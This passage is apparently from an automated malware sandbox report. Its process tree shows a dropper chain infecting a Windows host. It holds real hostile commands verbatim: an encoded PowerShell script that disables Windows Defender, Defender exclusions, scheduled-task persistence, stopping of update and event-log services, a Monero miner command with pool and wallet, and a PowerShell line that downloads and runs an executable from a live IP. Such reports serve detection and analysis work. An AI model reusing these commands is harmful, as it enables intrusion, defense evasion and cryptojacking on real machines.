BiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        9⤵
        
        PID:6824
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        10⤵
        Launches sc.exe
        
        PID:6428
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        10⤵
        
        PID:3248
        
        C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        10⤵
        
        PID:2440
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        10⤵
        
        PID:6900
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start lsass
        10⤵
        
        PID:5012
      - C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"
        6⤵
        
        PID:2088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5304
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6276
        
        C:\Program Files\RuntimeApp\0000028297.exe
        
        "C:\Program Files\RuntimeApp\0000028297.exe"
        7⤵
        
        PID:3132
      - C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"
        6⤵
        
        PID:3632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6516
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5152
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6692
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2528
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"
        8⤵
        
        PID:6468
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll
        9⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        9⤵
        
        PID:6168
      - C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"
        6⤵
        
        PID:4756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"
        6⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\mine.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mine.exe"
        7⤵
        
        PID:2232
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:16552
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:12256
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:16608
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:5204
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:4252
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:5172
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:17160
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:3056
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:1820
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:3784
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:5380
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        8⤵
        
        PID:1796
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsAutHost"
        8⤵
        Launches sc.exe
        
        PID:12312
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:12512
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:12580
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsAutHost"
        8⤵
        Launches sc.exe
        
        PID:12588
        
        C:\Users\Admin\AppData\Local\Temp\debuger.exe
        
        "C:\Users\Admin\AppData\Local\Temp\debuger.exe"
        7⤵
        
        PID:13056
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:13168
      - C:\Users\Admin\AppData\Local\Temp\10222760101\3595c557b8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222760101\3595c557b8.exe"
        6⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn bpsa8ma9hmu /tr "mshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn bpsa8ma9hmu /tr "mshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3304
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\AJfj74O4h.hta
        7⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\TempOTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE
        
        "C:\Users\Admin\AppData\Local\TempOTWK5VFJTARMAZJV20V9VFIFAWZ6KXJ7.EXE"
        9⤵
        
        PID:728
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "
        6⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        Delays execution with timeout.exe
        
        PID:3528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7020
      - C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"
        6⤵
        
        PID:5528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\backup.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\backup\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:16660
      - C:\Users\Admin\AppData\Local\Temp\10223440101\60579647f8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223440101\60579647f8.exe"
        6⤵
        
        PID:1840
      - C:\Users\Admin\AppData\Local\Temp\10223450101\17dffd538c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223450101\17dffd538c.exe"
        6⤵
        
        PID:17092
      - C:\Users\Admin\AppData\Local\Temp\10223460101\b7a02d7a29.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223460101\b7a02d7a29.exe"
        6⤵
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\10223470101\cf02b63317.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223470101\cf02b63317.exe"
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\10223480101\61d97d86d7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223480101\61d97d86d7.exe"
        6⤵
        
        PID:13816
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:14116
        
        C:\Windows\SysWOW64\taskkill.exe
        
